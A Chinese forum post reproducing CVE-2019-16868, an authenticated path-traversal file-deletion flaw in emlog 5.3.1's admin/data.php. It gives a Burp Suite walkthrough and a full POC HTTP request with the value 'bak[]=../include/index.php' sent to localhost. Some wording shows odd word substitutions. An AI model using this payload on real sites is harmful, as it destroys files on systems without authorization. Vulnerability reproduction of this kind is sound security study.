CVE-2019-16868-emlog安全漏洞分析复现-外链论坛

7wu1wm0 发表于 2024-10-3 18:45:45

CVE-2019-16868-emlog安全漏洞分析复现

<div style="color: black; text-align: left; margin-bottom: 10px;">
   <h1 style="color: black; text-align: left; margin-bottom: 10px;">0x01 前言</h1>
   <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">emlog是 "Every Memory Log" 的简<span style="color: black;">叫作</span>，意即：点滴记忆。</p>
   <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">它是一款基于PHP语言和MySQL数据库的开源、免费、功能强大的个人或多人联合撰写的博客系统。基于PHP和MySQL的功能强大的博客及CMS建站系统。</p>
   <h1 style="color: black; text-align: left; margin-bottom: 10px;">0x02漏洞分析</h1>
   <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">代码问题</strong> - admin/data.php</p>
   <div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p3-sign.toutiaoimg.com/pgc-image/0b65a8093ca64f17b063c18ca6e5c19c~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1728115202&x-signature=TmN7u3JMrssKhimWByju6mFlXo8%3D" style="width: 50%; margin-bottom: 20px;"></div>
   <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">复现过程</strong></p>
   <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">环境：emlog 5.3.1</strong></p>
   <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">登录管理并查看/admin/data.php?action=dell_all_bak</p>
   <div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p3-sign.toutiaoimg.com/pgc-image/8ee0c20e09ec43ccb97ac0ca1f39ea30~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1728115202&x-signature=Rn6QG88nID7Z6xTc4F%2BkALnXNd4%3D" style="width: 50%; margin-bottom: 20px;"></div>
   <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">利用burpsuite截获删除数据包</p>
   <div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p3-sign.toutiaoimg.com/pgc-image/ca7f4f02883a407390debb0c312398e4~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1728115202&x-signature=iBjsfwXazzsJ8F0QXAU6HQdBbT8%3D" style="width: 50%; margin-bottom: 20px;"></div>
   <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">在include文件夹下创建index.php</p>
   <div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p3-sign.toutiaoimg.com/pgc-image/e170e71eae95429a9ebb943c54fa572c~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1728115202&x-signature=myKsCg7UQ%2BeTfTYsIIpAwXnqqeA%3D" style="width: 50%; margin-bottom: 20px;"></div>
   <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">在bak[]后面写上../include/index.php</p>
   <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">返回302，<span style="color: black;">表率</span>成功。</p>
   <div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p3-sign.toutiaoimg.com/pgc-image/eebb3e0d4727449b89505bb7b52507fd~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1728115202&x-signature=lw77q8mijiA945VsQQYUEgO4jeg%3D" style="width: 50%; margin-bottom: 20px;"></div>
   <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">include文件夹index.php文件已成功删除</p>
   <div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p3-sign.toutiaoimg.com/pgc-image/093c41157cfc4d63b2d6a64060c6ac57~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1728115202&x-signature=hy2z%2BSoKJgT0bcfcJLGkXL%2FErCY%3D" style="width: 50%; margin-bottom: 20px;"></div>
   <h1 style="color: black; text-align: left; margin-bottom: 10px;">0x03 POC</h1>
   <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Host: 127.0.0.1</p>
   <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Content-Length: 28</p>
   <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Cache-Control: max-age=0</p>
   <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Origin: http://127.0.0.1</p>
   <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Upgrade-Insecure-Requests: 1</p>
   <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Content-Type: application/x-www-form-urlencoded</p>
   <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36</p>
   <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3</p>
   <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Referer: http://127.0.0.1/admin/data.php</p>
   <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Accept-Encoding: gzip, deflate</p>
   <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Accept-Language: zh-CN,zh;q=0.9</p>
   <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Cookie: page_iframe_url=http://127.0.0.1/metinfo/index.php?lang=cn&pageset=1; pgv_pvi=3037471744; PHPSESSID=u91v66ktst9vrva3ueb6333kt2; EM_AUTHCOOKIE_WtaQDRqaTBRof8EENT0LY3HNhJzryEPL=admin%7C%7Ce4739a735508976ba1d54ac95a78be3b; EM_TOKENCOOKIE_55cd567609038eefc9aaa8c1c0e141e1=d0025af7e912a4cc8b114e2f6cda6597</p>
   <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Connection: close</p>
   <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">bak%5B%5D=../include/index.php</p>
   <h1 style="color: black; text-align: left; margin-bottom: 10px;">0x04 修复<span style="color: black;">意见</span></h1>
   <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">emlog已知这个漏洞，相信官方<span style="color: black;">火速</span>会发布相应补丁。</p>
</div>

7wu1wm0 发表于 2024-10-18 16:33:35

感谢你的精彩评论，带给我新的思考角度。

页: [1]

外链论坛's Archiver

CVE-2019-16868-emlog安全漏洞分析复现